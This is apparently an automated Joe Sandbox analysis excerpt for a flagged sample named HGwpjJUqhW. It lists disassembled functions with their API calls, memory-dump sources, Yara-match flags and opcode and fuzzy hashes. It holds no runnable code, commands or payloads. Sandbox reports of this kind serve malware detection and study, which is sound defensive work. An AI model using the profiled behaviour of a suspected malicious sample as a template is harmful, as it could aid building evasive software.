                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                            • Instruction ID: 4717e109d3f11feb32530f71abb78b45ea0e8e3c9212be7baaea68f5f105e8a4
                                                                                                                            • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                            • Instruction Fuzzy Hash: 33F0B43EA44614DBDB29FBBC980177D32A2AF04729F144109F554EB3D1DB34A440DE5B
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 034B49D1
                                                                                                                              • Part of subcall function 034B381A: __getptd_noexit.LIBCMT ref: 034B381D
                                                                                                                              • Part of subcall function 034B381A: __amsg_exit.LIBCMT ref: 034B382A
                                                                                                                            • __getptd.LIBCMT ref: 034B49E8
                                                                                                                            • __amsg_exit.LIBCMT ref: 034B49F6
                                                                                                                            • __lock.LIBCMT ref: 034B4A06
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 034B4A1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                            • Instruction ID: 0b7436f166d0b83b746c00890d2e0ed0a44e04978ddb73f65c453f320cf3bd58
                                                                                                                            • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                            • Instruction Fuzzy Hash: 89F06D3A944720DFE621FFBB9802BCA76B4AF04620F15824FD414AF392DB2459418A7E
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0362C932
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 0362C938
                                                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 0362C947
                                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0362C96F
                                                                                                                            • ExitProcess.KERNEL32 ref: 0362C977
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3421218197-0
                                                                                                                            • Opcode ID: 6f25c89b656cde288031f36d19381f02ab0ca674dfa138e05b0298c167b6d516
                                                                                                                            • Instruction ID: dc01733d3d009466d369c960ccaac806793ce18695bdcefca03033c27deb1c2f
                                                                                                                            • Opcode Fuzzy Hash: 6f25c89b656cde288031f36d19381f02ab0ca674dfa138e05b0298c167b6d516
                                                                                                                            • Instruction Fuzzy Hash: 5DF05B75984318BBD720AB64DC5DFDB77B8FB04B00F200654B715A60D8DB706A44CF54
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 036275D2
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 036275D8
                                                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 036275E7
                                                                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0362760F
                                                                                                                            • ExitProcess.KERNEL32 ref: 03627617
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3421218197-0
                                                                                                                            • Opcode ID: 1d11b59397ba33164b0af99786070adfd4ff8e10881d1449db7dcd1269cc8d81
                                                                                                                            • Instruction ID: 4d0043280f8da34962767264f37c43e2f64c60b6ed46edeae343376f97ac1004
                                                                                                                            • Opcode Fuzzy Hash: 1d11b59397ba33164b0af99786070adfd4ff8e10881d1449db7dcd1269cc8d81
                                                                                                                            • Instruction Fuzzy Hash: 7BF05475984319BBE720ABA4DC5DFDA7BB8EB04B00F200694B719A60C8D7706A44CF54
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C382F0: _doexit.LIBCMT ref: 02C382FC
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 02C371BC
                                                                                                                              • Part of subcall function 02C39754: TlsGetValue.KERNEL32(00000000,02C398AD,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000), ref: 02C3975D
                                                                                                                              • Part of subcall function 02C39754: DecodePointer.KERNEL32(?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA,0000000D), ref: 02C3976F
                                                                                                                              • Part of subcall function 02C39754: TlsSetValue.KERNEL32(00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000,00000000,?,02C399BA), ref: 02C3977E
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 02C371C7
                                                                                                                              • Part of subcall function 02C39734: TlsGetValue.KERNEL32(?,?,02C371CC,00000000), ref: 02C39742
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 02C371DA
                                                                                                                              • Part of subcall function 02C39788: DecodePointer.KERNEL32(?,?,?,02C371DF,00000000,?,00000000), ref: 02C39799
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C371E3
                                                                                                                            • ExitThread.KERNEL32 ref: 02C371EA
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C371F0
                                                                                                                            • __freefls@4.LIBCMT ref: 02C37210
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 781180411-0
                                                                                                                            • Opcode ID: d61bd0b17d868569e001f3c1af9aabcddf9375070fc18a780494c19310b271c8
                                                                                                                            • Instruction ID: 87c23112def72cc8cc4e3a64eb6970d6b0ce3e6ef9367345670e04762a54b2b5
                                                                                                                            • Opcode Fuzzy Hash: d61bd0b17d868569e001f3c1af9aabcddf9375070fc18a780494c19310b271c8
                                                                                                                            • Instruction Fuzzy Hash: B5E0467A8006096B8F023BB18D4CA9F7A6EAE42394B000D00FA10A3040EBB89911AAA1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03631CD0: _doexit.LIBCMT ref: 03631CDC
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0362F9CA
                                                                                                                              • Part of subcall function 03633CA0: TlsGetValue.KERNEL32(00000000,03633DF9,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000), ref: 03633CA9
                                                                                                                              • Part of subcall function 03633CA0: DecodePointer.KERNEL32(?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06,0000000D), ref: 03633CBB
                                                                                                                              • Part of subcall function 03633CA0: TlsSetValue.KERNEL32(00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000,00000000,?,03633F06), ref: 03633CCA
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0362F9D5
                                                                                                                              • Part of subcall function 03633C80: TlsGetValue.KERNEL32(?,?,0362F9DA,00000000), ref: 03633C8E
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 0362F9E8
                                                                                                                              • Part of subcall function 03633CD4: DecodePointer.KERNEL32(?,?,?,0362F9ED,00000000,?,00000000), ref: 03633CE5
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0362F9F1
                                                                                                                            • ExitThread.KERNEL32 ref: 0362F9F8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362F9FE
                                                                                                                            • __freefls@4.LIBCMT ref: 0362FA1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 781180411-0
                                                                                                                            • Opcode ID: f8afe5ff3c7618405e2bddd8bb93c3521a0e87263ea4006e259261cb6895ebc4
                                                                                                                            • Instruction ID: 865ba6141be67ca50b48bb5ad1b433bf4593751b521a9c5acee748c284bef88f
                                                                                                                            • Opcode Fuzzy Hash: f8afe5ff3c7618405e2bddd8bb93c3521a0e87263ea4006e259261cb6895ebc4
                                                                                                                            • Instruction Fuzzy Hash: 97E0BF3DE4071977CB00BBB19E0999F7A2C5E03185B350458FA159F604DA68955187AD
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362944A
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629482
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1823113695-4289949731
                                                                                                                            • Opcode ID: e9b18e488e74c96efb90dbafa73938d2aefe79c0e2ddc77c41b076be4abe19b7
                                                                                                                            • Instruction ID: d1f202bce1b7309c464887c36885a769e60e4bd7928202bf27e3aaed57b9822e
                                                                                                                            • Opcode Fuzzy Hash: e9b18e488e74c96efb90dbafa73938d2aefe79c0e2ddc77c41b076be4abe19b7
                                                                                                                            • Instruction Fuzzy Hash: C8219533700A204BC720DD5CE88099AFBD9EBD5764F160A7FE192CB240D761D8508BB5
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036284C9
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EF9B
                                                                                                                              • Part of subcall function 0362EF86: __CxxThrowException@8.LIBCMT ref: 0362EFB0
                                                                                                                              • Part of subcall function 0362EF86: std::exception::exception.LIBCMT ref: 0362EFC1
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036284E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 963545896-4289949731
                                                                                                                            • Opcode ID: c01ded2327a3f2fab48b31a6618df0b8eedf8d5631ba25aaeeab3081b29490c1
                                                                                                                            • Instruction ID: b5e1480444be0b6a01f7f3eadff9b364762b1d24d1b2eaebce8fc4cad44d261e
                                                                                                                            • Opcode Fuzzy Hash: c01ded2327a3f2fab48b31a6618df0b8eedf8d5631ba25aaeeab3081b29490c1
                                                                                                                            • Instruction Fuzzy Hash: 2421D2317007269F8714DF6CED80C59B7A9BF88310701452DE916DB741E730EA14CBA4
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 02893A3A
                                                                                                                              • Part of subcall function 02893995: ___BuildCatchObjectHelper.LIBCMT ref: 028939CB
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 02893A51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3487967840-3733052814
                                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction ID: e5cf4e7924f0ecab90c470f09624c39d8323bcc67ed12400502e621476769e6b
                                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                            • Instruction Fuzzy Hash: 1C01E47D00050ABBDF12AE55CC48EAA7FAAEF09354F088050BD1C95560D73299B1DBA2
                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0362D868
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0362D938
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362D963
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2715074504-0
                                                                                                                            • Opcode ID: 4274ee5986e5920afb459a3da7a7fc20699de49956b23b07e6cb9c263a5abc62
                                                                                                                            • Instruction ID: 70ab52cf5f0efbef70f1b604ed1d168a333fd599e006fb95cace1c9c0a2d6e7a
                                                                                                                            • Opcode Fuzzy Hash: 4274ee5986e5920afb459a3da7a7fc20699de49956b23b07e6cb9c263a5abc62
                                                                                                                            • Instruction Fuzzy Hash: C241BA70A0060AAFDB10CF9AD880B6AFBF9FF88314F158599E82997340D774E901CF90
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2478854527-0
                                                                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                            • Instruction ID: 4182a7814d539edc21b882bb4220b3f1d3da7740e149097f32e872a01095ebb5
                                                                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                            • Instruction Fuzzy Hash: F6314C39840E35EAF721BF788D887293EE6EB49365B188516E518D7260FB32C481CF51
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2478854527-0
                                                                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                            • Instruction ID: 32454a918306ec557f472477efa948bef49b1066cb4c16487b2980835b537449
                                                                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                            • Instruction Fuzzy Hash: 9F315D35D05720EEEB12EF768C98A97BFB4EB48760B24451BF9109A271E7308045DF64
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3E459
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 02C3E48C
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C3E4BD
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C3E52B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 2e435683ad823ce04dfd59f14c4f7106de59bd14e8e47395d0011271a4764195
                                                                                                                            • Instruction ID: 431e47f6d17b4c4b964db38dd55374ec1a8a6d9644b231537a313773805baad9
                                                                                                                            • Opcode Fuzzy Hash: 2e435683ad823ce04dfd59f14c4f7106de59bd14e8e47395d0011271a4764195
                                                                                                                            • Instruction Fuzzy Hash: CB31C331A00255EFDF22DFA4C884ABA3BA5AF4D324F198DA9E4659B191E330DA40DF51
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0363A5F6
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0363A629
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0363A65A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0363A6C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 586bf94d9bf425192ddb87c307b910510ca2ce7a446bd273f3a16cfebad7ec0b
                                                                                                                            • Instruction ID: 155caf59e5ddb85b14a8f5abfe0f375cc88419ec08c66d5fa64e1a51d63cd5bd
                                                                                                                            • Opcode Fuzzy Hash: 586bf94d9bf425192ddb87c307b910510ca2ce7a446bd273f3a16cfebad7ec0b
                                                                                                                            • Instruction Fuzzy Hash: 8331B031A00256EFDB20DFA4C994DBE7BB5BF03221F1985A9E4918B290D330D960EB50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2425037729-0
                                                                                                                            • Opcode ID: 4b4dc806fbfcc7a2b344dc8dc66f1a869652c2732e871659fe6e5210f06bb019
                                                                                                                            • Instruction ID: 56ae6ae2da54d856c9f0d68a94f287ad5b99d8c830e7ea4b46fe952dca6c7e32
                                                                                                                            • Opcode Fuzzy Hash: 4b4dc806fbfcc7a2b344dc8dc66f1a869652c2732e871659fe6e5210f06bb019
                                                                                                                            • Instruction Fuzzy Hash: 9D210D76B006289BCB14DE59DC809BEB7A9EBC4750B2A806DED05C7701F7319D518AA0
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 02C343EC
                                                                                                                              • Part of subcall function 02C313A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C313CB
                                                                                                                              • Part of subcall function 02C34C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C34E35,?,02C342C8,02C34E35,00000000,?,?,02C34E35,?), ref: 02C34C77
                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 02C343D7
                                                                                                                            • SetLastError.KERNEL32(00000057), ref: 02C34401
                                                                                                                            • WSAGetLastError.WS2_32(?), ref: 02C34410
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1906775185-0
                                                                                                                            • Opcode ID: 1a1d72b7898fc110a862841a514041ddfc093da3d5bb732338660bf7fdbea67b
                                                                                                                            • Instruction ID: 4d493857a8477b12ee957656169c445df81bef32a60f8a43b912cbfe38cbf29e
                                                                                                                            • Opcode Fuzzy Hash: 1a1d72b7898fc110a862841a514041ddfc093da3d5bb732338660bf7fdbea67b
                                                                                                                            • Instruction Fuzzy Hash: DB11CA3BE0552C9B8721EE69F8446DFB7E8EFC4372B4409A6ED0DD7200D735991146D0
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 036243EC
                                                                                                                              • Part of subcall function 036213A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 036213CB
                                                                                                                              • Part of subcall function 036241E0: EnterCriticalSection.KERNEL32(03624FB5,03624E55,036242BE,00000000,?,?,03624E55,?,?,?,?,00000000,000000FF), ref: 036241E8
                                                                                                                              • Part of subcall function 036241E0: LeaveCriticalSection.KERNEL32(03624FB5,?,?,?,00000000,000000FF), ref: 036241F6
                                                                                                                              • Part of subcall function 03624C70: HeapFree.KERNEL32(?,00000000,?,00000000,03624E55,?,036242C8,03624E55,00000000,?,?,03624E55,?), ref: 03624C97
                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 036243D7
                                                                                                                            • SetLastError.KERNEL32(00000057), ref: 03624401
                                                                                                                            • WSAGetLastError.WS2_32(?), ref: 03624410
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2060118545-0
                                                                                                                            • Opcode ID: 0b8f9bcff18dc88dff2f9b231872290d2a62e4f4b52ac071df2aa7fb4ffdc4b7
                                                                                                                            • Instruction ID: d0c0cd64ff7031fe7ceeca91c8fda80f4caba382ab6dc6bbfedf12730686c72f
                                                                                                                            • Opcode Fuzzy Hash: 0b8f9bcff18dc88dff2f9b231872290d2a62e4f4b52ac071df2aa7fb4ffdc4b7
                                                                                                                            • Instruction Fuzzy Hash: 9D11EB3AA05528978710EF6AF4849DFBBA8EF85231B1905AAEC0CD7204DB3199014AD4
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 0362DE93
                                                                                                                            • _free.LIBCMT ref: 0362DED5
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0362DC95), ref: 0362DEFC
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0362DF03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap_free$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1072109031-0
